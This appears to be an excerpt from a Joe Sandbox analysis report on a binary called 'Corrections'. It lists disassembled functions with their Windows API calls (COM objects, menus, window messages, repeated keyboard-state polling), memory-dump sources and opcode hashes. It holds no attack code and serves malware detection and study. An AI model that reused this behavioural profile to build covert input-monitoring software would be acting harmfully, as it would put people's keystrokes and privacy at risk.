                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: 96cf4cff1e36bb700b03ed25338f32c8f1e58b169e74bcdfdbcfb6fb3505a8ae
                                                                                                                                                                                                                                                                                            • Instruction ID: ef3e1a76143e21421d37e48b4dc1fa5bbc598025edacbe3c0e132279ce7f24d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96cf4cff1e36bb700b03ed25338f32c8f1e58b169e74bcdfdbcfb6fb3505a8ae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46316932115219ABDF119FA4DE08FDA3BADFF09374F110315FA14A61A0D735D850EB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009A46B9
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 009A46E7
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 009A46F1
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009A478A
                                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 009A480E
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 009A4932
                                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 009A496B
                                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,009C0B64,?), ref: 009A498A
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 009A499D
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009A4A21
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009A4A35
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9d3625cfc0d3ba792c3438069e9ec210c4b4b4c38274135b3f90e91876071e80
                                                                                                                                                                                                                                                                                            • Instruction ID: a18bf0491aa9023cb09663805973e79311cc72a3ce26e09a6c551d483ed6842d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3625cfc0d3ba792c3438069e9ec210c4b4b4c38274135b3f90e91876071e80
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4C113716083059F9700DF68C884A2BB7E9FFCA758F10492DF9899B260DB71ED45CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00998538
                                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009985D4
                                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 009985E8
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(009C0CD4,00000000,00000001,009E7E8C,?), ref: 00998634
                                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009986B9
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00998711
                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0099879C
                                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009987BF
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 009987C6
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0099881B
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00998821
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bade1eb27d52c26763368bdc002c98416477222f1d708a2e2e83ba23aa4986e7
                                                                                                                                                                                                                                                                                            • Instruction ID: 54c10e689bc306fdf547b79489819349a6005aebab9378f4f453642b04dc5130
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bade1eb27d52c26763368bdc002c98416477222f1d708a2e2e83ba23aa4986e7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C13B75A00119AFCB14DFA8C888DAEBBF9FF49314B148599F419DB261DB30EE45CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0098039F
                                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 009803F8
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0098040A
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0098042A
                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0098047D
                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00980491
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009804A6
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 009804B3
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009804BC
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009804CE
                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009804D9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 06e0475067eedf2dc7f78b52e53b250e360e4bbd882f0db11b28ef8174bd0222
                                                                                                                                                                                                                                                                                            • Instruction ID: 765e4e0c7202e568abdf28d8e8dc1f24a11e879df8f7636295d989a09e41d9c9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06e0475067eedf2dc7f78b52e53b250e360e4bbd882f0db11b28ef8174bd0222
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F418335A00219DFCF10EFA4D8449AE7BB9FF88354F008469E955A7371EB34A945CF90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0098A65D
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0098A6DE
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 0098A6F9
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0098A713
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 0098A728
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0098A740
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0098A752
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0098A76A
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0098A77C
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0098A794
                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 0098A7A6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 572f4040ec62a56c93c7f25c3a22b8c5383a718a343bbe7b5c067ca1d7102cb8
                                                                                                                                                                                                                                                                                            • Instruction ID: 4b5bbf290ab8fa2e7c39e6c36047fd1ef50bc06f6281b4be43fbb68ef8630df0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 572f4040ec62a56c93c7f25c3a22b8c5383a718a343bbe7b5c067ca1d7102cb8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C41A4649047C96DFF31A66089043A5BEB86B11354F08815FD5C64A7C2FBA89DC8D7A3
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                            • Opcode ID: d9f6b721644f216065d034f835cdc27a3339d9ae70f92871f8d1ecd3e06c709f
                                                                                                                                                                                                                                                                                            • Instruction ID: 1257a7533827822d97a6d62d0b18303506c7b0bc33c601534a47b7a9853b29e6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9f6b721644f216065d034f835cdc27a3339d9ae70f92871f8d1ecd3e06c709f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B851C571A00516ABCF14DF6CC9909BEB7E9BF96364B204229E866E7284DB35DD40C7D0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 009A41D1
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 009A41DC
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,009C0B44,?), ref: 009A4236
                                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 009A42A9
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 009A4341
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 009A4393
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                            • Opcode ID: d735a50e4622ca59514253a89682e79ec73326519c58402dba9c885d65ac6924
                                                                                                                                                                                                                                                                                            • Instruction ID: 93708a338fdb358d89e107f57992f14b61ed11463091ca38b422d9372eca13b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d735a50e4622ca59514253a89682e79ec73326519c58402dba9c885d65ac6924
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2361AE716083019FC710DF64D988B6ABBE8EFCA714F000919F9959B291DBB4ED44CBD2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00998C9C
                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00998CAC
                                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00998CB8
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00998D55
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00998D69
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00998D9B
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00998DD1
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00998DDA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: 7603490a9438bdd1fa4ef561d97c09660db2666e2666f6867af244de14f25fa2
                                                                                                                                                                                                                                                                                            • Instruction ID: cb3efdcc4df44be87d45245cb2abaf44a751d06502b4fbac8e72e69c52410fd9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7603490a9438bdd1fa4ef561d97c09660db2666e2666f6867af244de14f25fa2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92616CB65083059FCB10EF64C844A9FB3E8FF9A310F04491EF99987291EB35E945CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 009B4715
                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 009B4724
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009B47AC
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 009B47C0
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 009B47CA
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009B47F7
                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 009B47FF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                            • Opcode ID: 67e9d74067b2a5df49b7aad9993706e6bbafa416b0e756a66c4f21513c4c72aa
                                                                                                                                                                                                                                                                                            • Instruction ID: 020e26173c8db1bc17ef42563155c78e2eedfd46890201903646db72498cb2f0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67e9d74067b2a5df49b7aad9993706e6bbafa416b0e756a66c4f21513c4c72aa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01418778A12209AFDB24CF64DA84EEA7BB9FF49324F144128FA0597351D7B0A910EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009828B1
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 009828BC
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 009828D8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 009828DB
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 009828E4
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 009828F8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 009828FB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 3b8e882bdfe82924806e2525e0e08dc0369357cf7cfe112219a898df63b8ddb4
                                                                                                                                                                                                                                                                                            • Instruction ID: 8879acf56080cc74f92748726683cf062e6a8faeb88b5b2f3340d19b342aa294
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b8e882bdfe82924806e2525e0e08dc0369357cf7cfe112219a898df63b8ddb4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D21C2B5900118BBCF05ABA0DC85EEEBBB8EF45360F000256F951A72D5DB355908DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00982990
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 0098299B
                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 009829B7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 009829BA
                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 009829C3
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 009829D7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 009829DA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 3978097ca84dc43b259fc7d36f417fff99ceffc18a1d945b114b924af9ea5ddf
                                                                                                                                                                                                                                                                                            • Instruction ID: 45552a6e7161f253b7df972a9f7678a25531b7980b8a8c7e162d809121cf9422
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3978097ca84dc43b259fc7d36f417fff99ceffc18a1d945b114b924af9ea5ddf
